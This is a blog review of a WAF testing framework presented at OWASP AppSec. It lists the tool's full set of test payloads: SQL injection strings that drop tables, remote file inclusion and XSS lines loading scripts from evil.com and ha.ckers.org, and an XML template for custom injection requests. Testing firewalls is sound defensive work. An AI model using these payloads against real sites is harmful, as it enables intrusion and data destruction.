Review: WAF Testing Framework

0 Comments

WAF Testing Framework is developed by Imperva employees (Yaniv Azaria, Amichai Shulman) and was presented at OWASP AppSec USA in 2012.
To work properly it requires:

  • Windows OS
  • Java 1.6
  • WebGoat application

imperva_wtt

Deployment

WebGoat application is provided with the tool, or you can use one from other sources (e.g. OWASPbwa). Deployment process looks easy - install Java and run compiled exe-file, but still you need at least one Windows VM to run the tool.
The network scheme looks this way

net_scheme-1

Tests

If first attack is blocked, the tool stops sending similar requests. So to get whole list of attacks I've sent them to unprotected application. There is a list of all possible requests below, which include: 5 HTTP Parameter Pollution, 33 Remote File Inclusion, 17 Cross-Site Scripting, 10 SQL injection.
Besides that the tool sends 234 legit requests, supposed to cause false-positives like

message=We dropped a million Deutschemark to get the schematic (and it was not worth it)
message=this is not good; drop the item you are holding!&SUBMIT=Submit
message=select one item from these funny things =)

HTTP Parameter Pollution

message=' or '&message=' <> 'x'
message=' or '&message=' <> 'xxx'
message=' or '&message=' <> 'xyz'
message=' or '&message=' = ','
message=' union/*&message=*/select number from credit_card

Remote File Inclusion

bidirect=http://www.acbdef.com/index.html
isDirect=http://www.acbdef.com/index.html
p_direction=http://www.acbdef.com/index.html
p_redirect_uri=http://www.acbdef.com/index.html
redirect=http://www.acbdef.com/index.html
redirect_uri=http://www.acbdef.com/index.html
redirecturl=http://www.acbdef.com/index.html
strRedirect=http://www.acbdef.com/index.html
document_root=http://www.evil.com/getdata.php
spaw_root=http://www.evil.com/getdata.php
CONF_INCLUDE_PATH=http://www.evil.com/getdata.php
page=http://www.evil.com/getdata.php
libpath=http://www.evil.com/getdata.php
base_path=http://www.evil.com/getdata.php
art=http://www.evil.com/getdata.php
dir=http://www.evil.com/getdata.php
url=http://www.evil.com/getdata.php
path_om=http://www.evil.com/getdata.php
include_path=http://www.evil.com/getdata.php
lang=http://www.evil.com/getdata.php
lng=http://www.evil.com/getdata.php
path_faqe=http://www.evil.com/getdata.php
lang=http://www.evil.com/getdata.php
root=http://www.evil.com/getdata.php
art=http://www.evil.com/getdata.php
lang=http://www.evil.com/getdata.php
path_om=http://www.evil.com/getdata.php
PathToRoot=http://www.evil.com/getdata.php
libpath=http://www.evil.com/getdata.php
goto=http://www.evil.com/getdata.php
goto=http://www.evil.com/getdata.php
template=http://www.evil.com/getdata.php
menu=http://www.evil.com/getdata.php

SQL Injection

message=' or 'a' = (select 'a')
message=' or 12345678 or 1=1
message= a' or 1 = (select 1 from dual)
message=a'; delete from customers where id = 12
message=a'; drop function login
message=a'; drop table users
message=a' or (case when 'a' then 1 else 0 end) = 0;
message=a' or (false) = 'c'	
message=a' or (select 1) = 1
message=a' or -+!1= -+!1

Cross-Site Scripting (XSS)

message=<BODY ONLOAD=alert('XSS')>
message=<IMG DYNSRC="javascript:alert('XSS')">
message=<IMG SRC=" &#14;  javascript:alert('XSS');">
message=<IMG SRC="jav&#x0A;ascript:alert('XSS');">
message=<IMG SRC="javascript:alert('XSS');">
message=<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
message=<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
message=<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
message=<IMG SRC=`javascript:alert("xxxx, 'XSS'")`>
message=<IMG SRC=javascript:alert(&quot;XSS&quot;)>
message=<IMG SRC=javascript:alert('XSS')>
message=<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
message=<SCRIPT/SRC="http://www.evil.com/xss.js"></SCRIPT>
message=<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
message=<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
message=<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
message=<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>

Custom attacks

The framework provides ability to add additional requests in XML format. Template looks this way

<?xml version="1.0" encoding="UTF-8"?>

<http-recording>
    <sequence repeat="1">
        <request method="POST" protocol="http" protocol-version="HTTP/1.1" path="/sendmsg.jsp">
            <headers>
                <header name="Accept"><![CDATA[application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*]]></header>
                <header name="Accept-Language"><![CDATA[en-US]]></header>
                <header name="Content-Type"><![CDATA[application/x-www-form-urlencoded]]></header>
                <header name="Pragma"><![CDATA[no-cache]]></header>
            </headers>
            <body><![CDATA[subj=&text='+or+1=1+--+1&Username=Anonymous&x=32&y=7]]></body>
            <comment>Simple SQL Injection</comment>
        </request>
     </sequence>
 </http-recording>

In request attributes should be set:

  • method: POST
  • protocol: http
  • protocol-version: HTTP/1.1
  • path including GET arguments: sendmsg.jsp
    Add headers to the requests like Accept,Accept-Language,Content-Type,Pragma.
    Request body and comment that will be included in the report.

Resume

Report Example

report.pdf

Pros

  • Easy to deploy if you have ready to use Windows environment
  • Framework allows to add custom attack samples in XML-format
  • Report looks nice

Cons

  • Low attacks amount
  • Attack samples are hard-coded somewhere inside compiled package
  • Windows platform to run the tool
  • No CSRF tokens support. If WAF adds CSRF token protection, all POST-requests would be blocked
  • Works adequately only with custom WebGoat application

Reference materials

Video-presentation

Download page
Description
Slides from presentation

Comments